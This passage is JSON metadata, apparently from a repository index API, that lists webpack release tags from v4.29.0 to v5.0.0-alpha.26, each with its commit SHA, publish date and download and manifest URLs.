ependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1